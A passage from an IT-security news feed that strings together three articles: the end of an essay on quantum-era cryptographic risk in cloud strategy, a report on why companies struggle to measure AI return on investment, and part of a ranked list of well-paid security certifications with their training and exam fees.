<p>The leadership issue adds time to the future of quantum computers.</p>



<p>Some data stolen today may still matter years from now. Some secrets age badly. Trade secrets, legal records, health data, source code, identity data and sensitive contracts don’t all expire at the same speed. Some decay like fruit. Some sit like plutonium.</p>



<p>That is why “harvest now, decrypt later” matters. An attacker may collect encrypted data today and wait for better tools tomorrow. You don’t need to panic. You do need to ask which data has a long secrecy life.</p>



<p>If your most sensitive long-lived data spans cloud platforms, SaaS services, backups, archives, collaboration tools and supplier systems, where exactly is your quantum exposure? Which encryption protects it? Who manages the keys? Which supplier has a plan? Which one has a brochure?</p>



<p>A brochure is a scented candle for anxious executives.</p>



<p>Migration also takes time. Cryptography hides everywhere. In applications. In identity systems. In network devices. In APIs. In firmware. In backup tools. In old systems, nobody wants to touch.</p>



<p>Quantum readiness goes beyond a weekend patch. It is discovery, classification, design, testing, contracts, funding, sequencing and proof.</p>



<p>The risky sentence is, “We’ll revisit this when things become clearer.”</p>



<p>By then, the cheap decisions may have left the building.</p>



<h2 class="wp-block-heading">The real issue is decision infrastructure</h2>



<p>AI exposed assumptions about speed, cost, data and suppliers. Quantum exposes timing, ownership, evidence and memory. Together, they point to a quieter weakness: decision infrastructure.</p>



<p>By decision infrastructure, I mean the system by which leaders frame risk, assign ownership, make trade-offs, record choices, track evidence and revisit assumptions when facts change. That sounds dull. Good. Dull is where serious governance lives. The glamorous stuff gets applause. The dull stuff prevents regret.</p>



<p>Many organizations saw the risk and still failed because too many people saw different pieces of it, and nobody owned the decision. The cloud team sees architecture. Security sees exposure. Legal sees liability. Procurement sees contract gaps. Finance sees cost drift.</p>



<p>The board sees amber. Amber is often where hard decisions go to nap.</p>



<p>This is why AI and quantum belong in the same leadership conversation. AI asks whether your cloud strategy can keep pace. Quantum asks whether it can cope with time. Both punish vague ownership.</p>



<p>Who owns long-term cryptographic exposure? Who can force a supplier conversation? Who accepts residual risk if migration cannot happen fast enough? Who records why a decision was made and when it must be reviewed?</p>



<p>Suppose those questions feel awkward, good. Awkward questions earn their rent.</p>



<h2 class="wp-block-heading">The questions leaders should ask now</h2>



<p>The board needs better questions.</p>



<p>Start with exposure. What protects your most sensitive systems and data? Where do you rely on supplier-managed encryption? Which systems are old, critical, poorly documented and painful to change?</p>



<p>Exposure is a map of assets, data, dependencies and time.</p>



<p>Then ask about ownership. Who owns quantum readiness across cloud, cyber, legal, procurement, privacy, resilience and the business? Who can make trade-off decisions when risk reduction competes with cost and delivery? Which risks are stuck because everyone is involved and nobody is accountable?</p>



<p>Awareness without ownership is just anxiety with better stationery.</p>



<p>Then ask about evidence. Can you show progress by system, supplier, business service and data class? Would your evidence survive a board review, a regulator’s questioning or a post-incident investigation?</p>



<p>Evidence built under pressure is expensive. It is also sweaty. Build the proof trail before the room gets hot.</p>



<p>Finally, ask about timing. Which choices must be made now because migration will take years? What event would trigger faster action? When will the board revisit the risk?</p>



<p>Which delay would you regret if the timeline moves faster than expected?</p>



<p>That last question matters. Regret is often the most honest risk metric in the room.</p>



<h2 class="wp-block-heading">What a quantum-aware cloud strategy looks like</h2>



<p>A quantum-aware cloud strategy is not a glossy side document owned by three cryptographers and a nervous intern.</p>



<p>It is a cloud strategy with better questions built into it:</p>



<ol class="wp-block-list">
<li><strong>Build cryptographic visibility.</strong> Start with the services that matter most. Find the encryption, certificates, protocols, keys, libraries and suppliers that protect them. Perfection can wait. Blindness cannot.</li>



<li><strong>Classify data by secrecy life.</strong> Not just sensitivity. Time. How long must this information stay protected? A short-lived report and a long-life trade secret do not belong in the same queue.</li>



<li><strong>Press suppliers for evidence.</strong> Ask what they are doing, what you must do and how they will prove progress. Confidence is lovely. Evidence pays the rent.</li>



<li><strong>Rank migration by risk.</strong> Start where business value, long-life data, weak visibility and migration pain meet. Treating everything as equal is how serious work becomes theatre.</li>



<li><strong>Change board reporting.</strong> Don’t report quantum as a foggy science project. Report decisions required, risks accepted, blockers, supplier gaps and review dates. Boards govern choices. Give them choices.</li>



<li><strong>Build a review rhythm.</strong> Standards, tools, suppliers, threats and regulations will continue to evolve. A stale roadmap is just a risk register wearing a lab coat.</li>
</ol>



<p>No panic. Panic burns energy and produces bad slides. The aim is readiness with owners, evidence and judgment.</p>



<h2 class="wp-block-heading">The cloud question grew up</h2>



<p>Cloud strategy began as an architecture question.</p>



<p>AI turned it into an operating question. Quantum turns it into a leadership question.</p>



<p>That is the shift.</p>



<p>To handle this well, organizations will need to build decision muscle early. They will know what matters, who owns it, what evidence exists, which suppliers are ready and when the next decision must be made.</p>



<p>But beneath cloud, AI and quantum sits the discipline leaders often avoid until pressure arrives, wearing a suit: decision quality.</p>



<p>AI changed the cloud bill. Quantum changes the clock.</p>



<p>And the clock is where risk hides.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why is it so hard to measure the ROI of AI?]]></title>
<description><![CDATA[Danish multinational pharmaceutical Novo Nordisk is very interested in speeding up the time it takes to get drugs to market as patents expire. “If you have a blockbuster drug, a one-week delay can be $10 to $100 million,” says Stephanie Bova, the company’s digital transformation officer. “It’s ma...]]></description>
<link>https://tsecurity.de/de/3653926/it-security-nachrichten/why-is-it-so-hard-to-measure-the-roi-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653926/it-security-nachrichten/why-is-it-so-hard-to-measure-the-roi-of-ai/</guid>
<pubDate>Wed, 08 Jul 2026 12:08:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Danish multinational pharmaceutical Novo Nordisk is very interested in speeding up the time it takes to get drugs to market as patents expire. “If you have a blockbuster drug, a one-week delay can be $10 to $100 million,” says Stephanie Bova, the company’s digital transformation officer. “It’s massive money because you have less time on patent.”</p>



<p>Gen AI offered the possibility of dramatically speeding up multiple steps in the drug development process. And since Novo Nordisk was already carefully tracking how long its key processes took, it had an advantage that many companies didn’t. So it should’ve been relatively simple to sprinkle in some gen AI, see productivity improve, and watch the money roll in. But it wasn’t that easy. A drug development process has many parts, happening at different times in different departments.</p>



<p>“People are experts in their own domains but don’t necessarily know the next domain and how it all fits together,” Bova says. “The system is so big and complex that you’re not able to see all the performance at once.”</p>



<p>Process documentation might not match what people actually do in practice, and different people might do the same task in different ways. And some crucial tasks might be nearly invisible from the outside. The manufacturing team, for example, might sit in a completely different group and not be aware the drug is getting ready for FDA submission, and don’t have all their documents ready yet.</p>



<p>“So you’ve run very fast only to have to wait for them to catch up,” Bova adds.</p>



<p>This is just one of many challenges companies face when trying to measure the results of AI projects, and why surveys are so contradictory.</p>



<p>Looking at individual tasks, Novo Nordisk can show productivity improvements and clear positive benefits to its use of AI. But stepping back and looking at the company’s bottom line, the picture gets murkier. First, if critical steps are missed, then time to market won’t improve. It also takes years for a new drug to get to customers, so any positive bottom-line effects won’t be felt for a while. And that’s just the start of the <a href="https://www.cio.com/article/4159823/ai-doesnt-create-roi-organizations-do.html?utm=hybrid_search">ROI measurement problem</a>.</p>



<h2 class="wp-block-heading">Process measurement</h2>



<p>To address its process blind spots, Novo Nordisk turned to the new generation of process mining: AI-powered real-time digital twins of operations.</p>



<p>“We partnered with process intelligence company Celonis to get a digital twin of our process data,” Bova says. “We were the first in the industry to apply it to the clinical setting.” The tool collects information from enterprise systems to track what employees actually do, rather than using surveys to collect information on what a fraction of employees remembered doing at some point.</p>



<p>The first project was a simple, seven-step process, and in creating a digital twin of it, Novo Nordisk discovered that, depending on who was doing it, it could be a five- or nine-step process. “If you get 10 different subject matter experts in a room, you get all kinds of interpretations, and you have drift over time,” she says.</p>



<p>The project exposed multiple flaws in existing processes. In some cases, employees needed to be retrained. In one, the user interface had to be updated. Once a process is standardized, though, there’s an opportunity to take the before picture, so there’s something to compare to afterward, to see if the AI augmentation or automation show any results.</p>



<p>Another thing they had to figure out ahead of time was decide what to do with any time savings that showed up.</p>



<p>“You don’t want to lay people off,” Bova says. “These are highly technical, hard-to-find talent. Maybe we want to think about redistributing teams a bit.”</p>



<p>Today, the company has several hundred AI agents in active deployment, tagged inside the digital twin infrastructure so they can be identified.</p>



<p>“If something screws up, we know exactly where to fix it,” she says, adding that the next phase is multi-agent orchestration. “Today, we have them connected, but we don’t have agents of agents.”</p>



<p>It’s too early to say if there’s ROI yet because, for drug development, the process takes years. “But by looking at the end-to-end process, my hope is we’ll find two years of cycle time to engineer out,” she says. “Two years quicker to market, compared to where we are now.”</p>



<p>Drugs that are already in the final phase of development won’t see as much acceleration, but those just starting out will benefit the most. The bottom line results, however, won’t show up for several years.</p>



<p>The pharmaceutical industry isn’t the only one where true value comes from optimizing multiple interconnected processes at once. <a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html" rel="nofollow">According to PwC</a>, tactical AI projects often don’t deliver measurable value, with tangible returns coming from enterprise-scale deployments consistent with business strategy.</p>



<p>In fact, many companies have seen neither increased revenue nor decreased costs from AI in the last 12 months despite nearly universal adoption of AI. Still, enterprise spending on AI is set to nearly double by the end of the year compared to last year, according to <a href="https://kpmg.com/us/en/media/news/q1-ai-pulse2026.html" rel="nofollow">KPMG</a>.</p>



<h2 class="wp-block-heading">Productivity measurement</h2>



<p>Most companies start on a smaller scale, rolling out AI chatbots to employees to help improve productivity. And the pace of adoption here has been staggeringly high, matched only by a lack of ability to measure the productivity gains that are supposed to be achieved.</p>



<p>Having a baseline is key, says Anand Rao, professor of AI at Carnegie Mellon University, but it’s difficult to measure in some cases, and all but impossible in others. Take for example insurance decisions where results can take years to show up. With life insurance, it could be decades, he says. And for some types of decisions, companies don’t have any measurements at all.</p>



<p>“There’s a social stigma to saying that I’m trying to look at your decision-making and how well you’re making the decisions,” he says. “As humans, we don’t like to be measured for our decisions.”</p>



<p>Then, when a decision turns out well in the end, people are happy to take credit. “If the decision goes badly, it’s something outside,” he says.</p>



<p>But even for specific tasks where measurement is possible, companies often don’t put in the work to make the measurements prior to rolling out AI tools. “We didn’t start with a baseline,” says Julie Averill, former EVP and global CIO of fashion retailer Lululemon. Averill is now CEO at Gold Thread, a digital transformation consultancy.</p>



<p>“We started with the assumption that AI was going to help people make better decisions,” she says. “And that sets you up to not being able to measure well.”</p>



<p>There are alternative metrics that a company can look at instead, she adds, like usage rates or user satisfaction. “This is happening, and it’s bringing benefits,” she says, “some of which you can see, and some you can’t. You have to trust the process. It’s just like the cloud. You know it’s the way of the future and you can see the benefits, but it’s hard to get there, and there’s a lot of change required. But the sooner you do that, the sooner you’re in the new way of operating and can really take advantage of it.”</p>



<p>There are other areas where hard metrics are more readily available, like customer service. “These are repeatable tasks, and it’s usually the first place companies automate with AI,” Averill says. “There are very tangible results you can measure, and you can have a very good baseline.”</p>



<p>Lululemon has also been using AI for years for better personalization and recommendations, and that’s also an area that can be quantified. And automation can reduce manual data entry, reducing error rates. AI can also be used to help with compliance monitoring, fraud detection, and predictive maintenance for equipment, which are all use cases that can be quantified.</p>



<p>But employee productivity in general? That’s a tough one to measure, and not just for Lululemon. One obvious way might be to look at layoffs in professions exposed to AI. After all, the headlines are everywhere. But in <a href="https://www.anthropic.com/research/labor-market-impacts" rel="nofollow">a report released in March</a>, Anthropic found no signs of an increase in unemployment in highly exposed professions, those in which people are most likely to be laid off due to AI.</p>



<p>In early 2025, research firm METR attempted to quantify developer productivity by comparing how fast experienced developers were able to achieve tasks with AI and without. The result? Developers said they were expecting AI to speed them up by 24%, and estimated that AI had actually sped them up by 20%. But the data showed an altogether different story. Their use of AI actually slowed them down by 19%.</p>



<p>Of course, AI tools are getting better. METR attempted to do a follow-up study, again tracking tasks done with and without AI, but they couldn’t find enough developers willing to go back to the no-AI approach, even though the researchers were paying them to participate in the study.</p>



<p>There are anecdotal reports of companies where one engineer does the work of a hundred by using AI. Or that time the entire half-million-line Claude Code codebase was accidentally leaked and Korean developer Sigrid Jin created a clean-room rebuild in two hours, which he then pushed to GitHub, where it became the fastest project in history to hit 100,000 stars.</p>



<p>But as with anything else having to do with AI, the real picture is more complicated. With software development in particular, typing the code is actually just a fraction of what’s involved in developing software.</p>



<p>Research firm DX recently analyzed key engineering metrics from 400 companies, and in a recent report found that AI usage increased by 65% since November 2024, but AI-related productivity was just under 10%.</p>



<h2 class="wp-block-heading">Hidden costs</h2>



<p>Just as it’s difficult to measure the productivity benefits of AI, it can also be tricky to measure the costs. When a company first starts using AI, costs might be relatively simple to estimate. What’s the total monthly subscription charges for the AI chatbots that employees are using? What’s the cost of training or fine-tuning a custom model? But when you move on to more complex use cases, the calculations get more difficult, says Averill.</p>



<p>“Now there are all the systems around the AI,” she says. “Those are harder to measure, but the impact is bigger.”</p>



<p>For example, if AI is embedded into business processes using RAG, there’s the ongoing expense of the API calls, but also the changes that need to be made to other systems, she says. And it just keeps getting more complicated every day.</p>



<p>“We haven’t taken a very concerted effort to putting telemetry and instrumentation in place,” says Swaminathan Chandrasekaran, global head of AI and data labs at KPMG. He says that getting a comprehensive picture of the total costs of AI in an enterprise is like predicting the weather.</p>



<p>“The reason we have a pretty awesome weather prediction system in this country is because we have tens of thousands of weather stations that aggregate data,” he says. “Without that, we wouldn’t know the weather.”</p>



<p>Companies need to set up instrumentation to measure all the aspects of AI-related consumption, he says, starting with the number of tokens used, who’s using them, and how it correlates to work output.</p>



<p>“That measurement is fundamentally lacking,” he says.</p>



<p>At least when humans are using AI chatbots, there’s a limit to how many questions they’re physically able to ask, combined with predictable subscription costs. And when business processes are AI-enabled via RAG, the API calls to LLMs are being made by predictable, traditionally-scripted business systems.</p>



<p>But now, agentic AI is making everything worse because the agents can act unpredictably, and the number of API calls can quickly spiral out of control. In a report by the <a href="https://www.bcg.com/publications/2026/how-leaders-build-an-ai-first-cost-advantage" rel="nofollow">Boston Consulting Group</a>, two-thirds of companies are reporting uncontrollable AI scaling expenses.</p>



<p>Another cost some companies might not anticipate well, or not track because it’s part of a different budget, is data-related cost. Whether preparing data for training or fine-tuning, using RAG embeddings, or setting up direct MCP access via agents, these costs can quickly add up when AI comes into the picture.</p>



<p>“Egress fees are one of the big ones,” says Tom Coughlin, IEEE fellow and president of consulting firm Coughlin Associates. “If you have to bring data out of the cloud, those egress fees could be considerable.”</p>



<p>Then there are all the <a href="https://www.cio.com/article/4152626/organizations-often-dont-measure-the-cost-of-it-inefficiency-but-it-can-be-huge.html?utm=hybrid_search">human costs of deploying AI</a>, he adds.</p>



<p>“There’ll be a lot of value that people get out of AI in the long run, but they need to know how to use it properly,” he says. “If they don’t have those skills, you’ll be at a disadvantage.”</p>



<h2 class="wp-block-heading">Solutions and mixed messages</h2>



<p>Then there’s fixing problems. A majority of companies have had at least one AI-related incident in the last 18 months, with most resulting in financial loss, some over $500,000. Then there’s the AI that’s being embedded in everything.</p>



<p>“We know our direct costs,” says Andrew Johnson, CIO at Brownstein Hyatt Farber Schreck, a leading national law firm. “But where it becomes more difficult to measure is with platforms we already have in place, and SaaS applications that didn’t have AI capabilities,” he says. “They’re asking for extraordinary increases and attribute them to new capabilities due to AI. How much should be ascribed to AI? That’s a little wishy-washy.”</p>



<p>Even when AI saves money, there are often extra costs associated with that. For example, the firm was spending about $70,000 a year on a contract management platform. Building their own version with AI took about $40,000 in labor costs and another $3,000 a year for hosting. Ongoing maintenance will be minor for that particular application, he adds, totaling another couple of thousand a year.</p>



<p>But there are also other indirect costs that come with running your own applications, including security audits, vulnerability assessments, penetration tests, and code review.</p>



<p>“The more complex and riskier the platform, the less appetite there is for trying to create an in-house solution,” he says.</p>



<p>Still, the software development team is now dramatically more productive as a result of AI, with four or five developers able to do the work of 20 or 30.</p>



<p>But the productivity improvements don’t translate to labor savings, since there’s plenty of new work for the developers to do. “We have an enormous backlog of opportunities to develop solutions,” he says.</p>



<p>The tendency of work to expand to fill the time available isn’t just true for software development, says Carnegie Mellon’s Rao.</p>



<p>Say for example, AI is expected to lead to a 20% improvement in productivity, he says. “There were a hundred people doing it, and now we only need 80.” But at the end of the year, headcount hasn’t changed. “The tasks they were doing, there’s improvement,” he adds “But humans will add tasks to supplement or complement that 20%. It’s not that they’re going home an hour early, but they’re finding other value-generating activities.”</p>



<p>In fact, in some cases, increased productivity at a company can actually hurt the bottom line. Lawyers, for example, bill by the hour.</p>



<p>“Efficiency runs counter to our traditional ways of making money,” says Brownstein’s Johnson. “We have to think past that. It’s not detrimental to our long-term interest, but it’s a challenge in the short term. If we don’t do this, though, it’s likely we won’t be competitive in the mid- to long-term.”</p>



<p>So if a new AI tool helps an attorney with due diligence, there’s no straight line between the investment in that tool and increased revenues.</p>



<p>“It’s a given that it’s directionally right,” Johnson says. “But we can’t say it’s going to lead to a particular return.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[13 in-demand IT security certifications for higher pay]]></title>
<description><![CDATA[With change a constant, cybersecurity professionals looking to improve their careers can benefit from the latest insights into employers’ needs. Data from Foote Partners on the skills and certification most in demand today may provide helpful signposts.



Analyzing more than 660 certifications a...]]></description>
<link>https://tsecurity.de/de/3653485/it-security-nachrichten/13-in-demand-it-security-certifications-for-higher-pay/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653485/it-security-nachrichten/13-in-demand-it-security-certifications-for-higher-pay/</guid>
<pubDate>Wed, 08 Jul 2026 09:08:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>With change a constant, cybersecurity professionals looking to improve their careers can benefit from the latest insights into employers’ needs. Data from Foote Partners on the skills and certification most in demand today may provide helpful signposts.</p>



<p>Analyzing more than <a href="https://footepartners.com/pages/report-skills-certs">660 certifications</a> as part of its 2Q 2026 “IT Skills Demand and Pay Trends Report,” Foote Partners calculated the most valuable IT security certifications to pursue right now based on two dimensions. The first, the <a href="https://www.cio.com/article/350363/pay-for-in-demand-it-skills-rises-fastest-in-14-years.html">average pay premium</a>, measures the difference in pay between IT pros with a particular credential and those without it. The second, market value increase, measures the increase in pay gains over the past six months.</p>



<p>Together, average pay premium and market value increase can give cybersecurity pros a starting point in deciding which certification to pursue for more pay. Apart from considering their overall professional goals, security professionals should consider each certification’s training and exam costs, whether vendor-specific or vendor-neutral, and the lateral or vertical role opportunities it may open.</p>



<p>Here are the top 13 certifications paying higher premiums today in descending order.</p>



<h2 class="wp-block-heading">GIAC Security Expert (GSE)</h2>



<p>The <a href="https://www.giac.org/get-certified/giac-portfolio-certifications">GIAC Security Expert</a> (GSE) portfolio certification is for security leaders wishing to prove their status as a top information security practitioner by showing they have offensive and defensive skills and hands-on practical skills. Available for more than 15 years, the GSE is considered one of the broadest and deepest cybersecurity certifications. To earn the certification, candidates must complete any six <a href="https://www.giac.org/get-started/practitioner">practitioner</a> certifications and any four <a href="https://www.giac.org/get-started/applied-knowledge">applied knowledge</a> certifications.</p>



<p>GIAC allows candidates to customize the certification to fit their expertise and career. Candidates can also build their certification over any amount of time as along as the required certifications within the portfolio remain active. Practitioner certification exams are 2-5 hours in length, depending on the specific certification attempt, and applied knowledge certification exams are 4 hours in length.</p>



<p><strong>Training fees:</strong> Some training is offered in affiliation with SANS Institute and costs $8,780.</p>



<p><strong>Exam Fees:</strong> Because you need 10 certifications to achieve the GSE <a href="https://www.giac.org/pricing">prices vary significantly</a>. If you already hold a GIAC Certified Forensic Analyst (GCFA), the cost of one of the required certifications drops from $1,299 to $499. Most required certifications are priced at either $999 or $1,299 per attempt, though they can cost up to $11,190.</p>



<h2 class="wp-block-heading">GIAC Security Professional (GSP)</h2>



<p>The <a href="https://www.giac.org/get-certified/giac-portfolio-certifications">GIAC Security Professional (GSP)</a> is designed to demonstrate the holder’s depth and breadth of information security knowledge. Launched approximately two years, this newer certification is the halfway point to the GSE. Customization of the certification is allowed, and to achieve it a candidate must complete any three <a href="https://www.giac.org/get-started/practitioner">practitioner</a> certifications and any two <a href="https://www.giac.org/get-started/applied-knowledge">applied knowledge</a> certifications. Candidates can also build their certification over any amount of time as along as the required certifications within the portfolio remain active. Practitioner Certification exams are 2-5 hours in length, depending on the specific certification attempt, and Applied Knowledge Certification exams are 4 hours in length.</p>



<p><strong>Training fees:</strong> Some training is offered in affiliation with SANS Institute and costs $8,780.</p>



<p><strong>Exam Fees:</strong> Because you need five certifications to achieve the GSP <a href="https://www.giac.org/pricing">prices vary significantly</a>. If you already hold a GIAC Security Essentials (GSEC), the cost of one of the required certifications drops from $1,299 to $499. Most certifications required are priced at either $999 or $1,299 per attempt, though certification can cost up to $5,595.</p>



<h2 class="wp-block-heading">Microsoft Certified Azure Cybersecurity Architect Expert</h2>



<p>Those who earn the <a href="https://learn.microsoft.com/en-us/credentials/certifications/cybersecurity-architect-expert/">Microsoft Certified: Cybersecurity Architect Expert</a> credential are able to translate a cybersecurity strategy into capabilities that protect the assets, business, and operations of an organization. Through the certification process, candidates learn to design, guide the implementation of, and maintain security solutions that follow zero-trust principles and best practices. You’ll also be able to design solutions for governance, risk, and compliance (GRC), security operations, and security posture management.​</p>



<p>As a prerequisite, candidate must have earned one of the following: <a href="https://learn.microsoft.com/en-us/credentials/certifications/azure-security-engineer/">Microsoft Certified: Azure Security Engineer Associate</a>, <a href="https://learn.microsoft.com/en-us/credentials/certifications/identity-and-access-administrator/">Microsoft Certified: Identity and Access Administrator Associate</a>, <a href="https://learn.microsoft.com/en-us/credentials/certifications/security-operations-analyst/">Microsoft Certified: Security Operations Analyst Associate</a> certification.</p>



<p><strong>Training fees: </strong>Self-paced training is available from the course’s page and free of charge. There is also an option to find an instructor-led training with pricing starting at $1,300.</p>



<p><strong>Exam Fees:</strong> The exam costs $165 and Microsoft offers free practice assessments.</p>



<h2 class="wp-block-heading">Certificate of Cloud Security Knowledge (CCSK)</h2>



<p>As a certificate and not a certification — an important distinction — the Cloud Security Alliance (CSA) positions its <a href="https://cloudsecurityalliance.org/education/ccsk">Certificate of Cloud Security Knowledge</a> as the foundation for future credentials and upskilling in the sector. From this perspective, the CCSK is helpful for cybersecurity analysts, compliance managers, security engineers, architects, and administrators. This vendor-neutral certificate has been recently updated and covers topics in zero trust, DevSecOps, cloud telemetry and security analytics, artificial intelligence, and more. CCSK offers a variety of training modalities, including an exam prep kit, instructor-led classes offered virtually and in person, and an online self-paced option. Candidates must score at least 80% on the exam, randomly pulling 60 multiple-choice questions from a test bank.</p>



<p><strong>Training fees:</strong> Prices vary based on modality. A self-paced course<a href="https://cloudsecurityalliance.org/education/ccsk#preparing-for-the-ccsk"> and exam bundle costs $795</a>, and online, instructor-led training begins at<a href="https://cloudsecuritypass.com/training/"> </a><a href="https://cloudsecuritypass.com/training/">$995</a>.</p>



<p><strong>Exam fees:</strong> The exam costs $445, though discounts are<a href="https://cloudsecurityalliance.org/membership"> available for corporate members</a>, and<a href="https://cloudsecurityalliance.org/education/ccsk/free-for-veterans"> </a><a href="https://cloudsecurityalliance.org/education/ccsk/free-for-veterans">US military veterans can take it for free</a>.</p>



<h2 class="wp-block-heading">Certified in Risk and Information Systems Control (CRISC)</h2>



<p>Administered by ISACA, the<a href="https://www.isaca.org/credentialing/crisc"> </a><a href="https://www.csoonline.com/article/571249/crisc-certification-your-ticket-to-the-c-suite.html">Certified in Risk and Information Systems Control</a> certification provides candidates with training across four domains: corporate IT governance, risk assessment, risk response and reporting, and technology and security. CRISC is ideal for candidates who want to enhance and optimize business resilience and risk management across their organization. The exam consists of 150 questions across the four domains. Since ISACA began offering CRISC in 2010, more than 23,000 people have obtained the certification. ISACA claims 52% of certificate holders experienced on-the-job improvement, and CRISC is the “4th top-paying certification worldwide.” To qualify for CRISC, candidates must adhere to a code of professional ethics and have <a href="https://support.isaca.org/s/article/What-are-the-requirements-to-become-CRISC-certified">three years of work experience</a> in risk assessment and risk response and reporting. On passing the exam, candidates must submit 20 CPE credits annually and<a href="https://www.isaca.org/-/media/files/isacadp/project/isaca/certification/crisc/crisc-cpe/crisc-cpe-policy.pdf"> </a><a href="https://www.isaca.org/-/media/files/isacadp/project/isaca/certification/crisc/crisc-cpe/crisc-cpe-policy.pdf">120 continuing professional education (CPE) hours</a> every three years to maintain their CRISC.</p>



<p><strong>Training fees:</strong> ISACA offers three resources: an<a href="https://store.isaca.org/s/store#/store/browse/detail/a2S4w000004Km4PEAS"> </a><a href="https://store.isaca.org/s/store#/store/browse/detail/a2SVQ000001VR1l2AG">online review course</a>, $895; a review manual in<a href="https://store.isaca.org/s/store#/store/browse/detail/a2S4w000004Tx3aEAC"> </a><a href="https://store.isaca.org/s/store#/store/browse/detail/a2SVQ000001FWgY2AW">print</a> or<a href="https://store.isaca.org/s/store#/store/browse/detail/a2S4w000004Tx60EAC"> </a><a href="https://store.isaca.org/s/store#/store/browse/detail/a2SVQ000001FoOv2AK">digital</a>, $139; and an<a href="https://store.isaca.org/s/store#/store/browse/detail/a2S4w000004Ko5TEAS"> </a><a href="https://store.isaca.org/s/store#/store/browse/detail/a2SVQ000001IPKL2A4">annual subscription to a 833-question test bank</a>, $399. Discounts are available for ISACA members.</p>



<p><strong>Exam fees: </strong>$575, ISACA members; $760 for non-members; plus $50 application fee.</p>



<h2 class="wp-block-heading">Certified Information Systems Auditor (CISA)</h2>



<p>The Information Systems Audit and Control Association (ISACA)’s CISA is geared toward IT auditors who wish to upskill or earn a pay boost. According to ISACA, 70% of CISA holders report on-the-job improvement, and another 22% receive a raise. The course covers five domains: information systems auditing, implementation, and operations; protection of information assets; and IT governance. The<a href="https://www.isaca.org/-/media/files/isacadp/project/isaca/certification/exam-candidate-guides/2024/exam-candidate-guide-2024.pdf"> </a>four-hour exam consists of 150 multiple-choice questions, and candidates must earn 450 on ISACA’s scaled scoring system, with 800 representing a perfect score. To<a href="https://www.isaca.org/credentialing/cisa/maintain-cisa-certification"> </a><a href="https://www.isaca.org/credentialing/cisa/maintain-cisa-certification">maintain their CISA</a>, certification holders must take 20 CPE credits annually and 120 over three years through conferences, volunteering, on-demand learning, and other methods as well as paying maintenance fee. To qualify, you must have five years of experience in IT or IS audit, control, assurance, or security. You can apply for an experience waiver for up to three years.</p>



<p><strong>Training fees:</strong> ISACA offers four resources: an<a href="https://store.isaca.org/s/store#/store/browse/detail/a2SVQ000000Fqvx2AC"> </a><a href="https://store.isaca.org/s/store#/store/browse/detail/a2SVQ000000Fqvx2AC">online review course</a> for $895, an<a href="https://store.isaca.org/s/store#/store/browse/detail/a2S4w000008KxGWEA0"> </a><a href="https://store.isaca.org/s/store#/store/browse/detail/a2S4w000008KxGWEA0">annual subscription to a question bank</a> for $399, and a print or digital<a href="https://store.isaca.org/s/store#/store/browse/detail/a2S4w000004W2rOEAS"> </a><a href="https://store.isaca.org/s/store#/store/browse/detail/a2S4w000004W2rOEAS">review manual</a> for $139. Discounts are available for ISACA members. </p>



<p><strong>Exam fees:</strong> $575, members; $760, non-members; plus $50 application fee.</p>



<h2 class="wp-block-heading">Certified Information Systems Security Professional (CISSP)</h2>



<p><a href="https://www.csoonline.com/article/570239/cissp-certification-requirements-training-and-cost.html">CISSP</a> is a generalist cert from ISC2 aimed at security pros who have already established a strong track record. Advanced-level analysts interested in getting CISSP certified will need to know all the ins and outs of security and risk management, asset security, operations, security assessment and testing, and more. The CISSP certification requires five years of full-time experience in at least two of its <a href="https://www.isc2.org/certifications/cissp#The%20CISSP%20Exam">eight domains</a>. The exam is <a href="https://www.isc2.org/Certifications/CISSP/CISSP-CAT">adaptive</a>, ranging from 100 to 150 questions, including multiple-choice and advanced items of varying formats. Candidates need to score 700 points out of 1,000 to pass the exam.</p>



<p><strong>Training fees:</strong><a href="https://www.isc2.org/training/online-self-paced/cissp-online-self-paced"> </a>Online self-paced training <a href="https://www.isc2.org/training#CISSP">fees start</a> at $595 and can cost up to $1,993;<a href="https://www.isc2.org/training/online-instructor-led/cissp-online-instructor-led"> </a>online instructor-led bootcamp costs $2,880.</p>



<p><strong>Exam fee:</strong><a href="https://www.isc2.org/register-for-exam/isc2-exam-pricing"> </a><a href="https://www.isc2.org/register-for-exam/isc2-exam-pricing">$749</a></p>



<h2 class="wp-block-heading">Certified Secure Software Lifecycle Professional (CSSLP)</h2>



<p>This ISC2 certification helps cyber pros build their career by training them to better incorporate security practices throughout software development phases. The <a href="https://www.isc2.org/certifications/csslp">CSSLP</a> exam evaluates experience across eight domains: secure software concepts; secure software; lifecycle management; secure software requirements; secure software architecture and design; secure software implementation; secure software testing; secure software deployment, operations, maintenance; secure software supply chain. Those wishing to acquire the CSSLP must have four years of paid work experience as a software development lifecycle professional in one or more of the eight domains.</p>



<p><strong>Training fees:</strong><a href="https://www.isc2.org/training/online-self-paced/cissp-online-self-paced"> </a>Online self-paced training <a href="https://www.isc2.org/training#CSSLP">fees start</a> at $550 and can cost up to $1,718; online instructor-led bootcamp costs $2,650.</p>



<p><strong>Exam fee:</strong> <a href="https://www.isc2.org/register-for-exam/isc2-exam-pricing">$599</a></p>



<h2 class="wp-block-heading">Check Point Certified Security Master (CCSM)</h2>



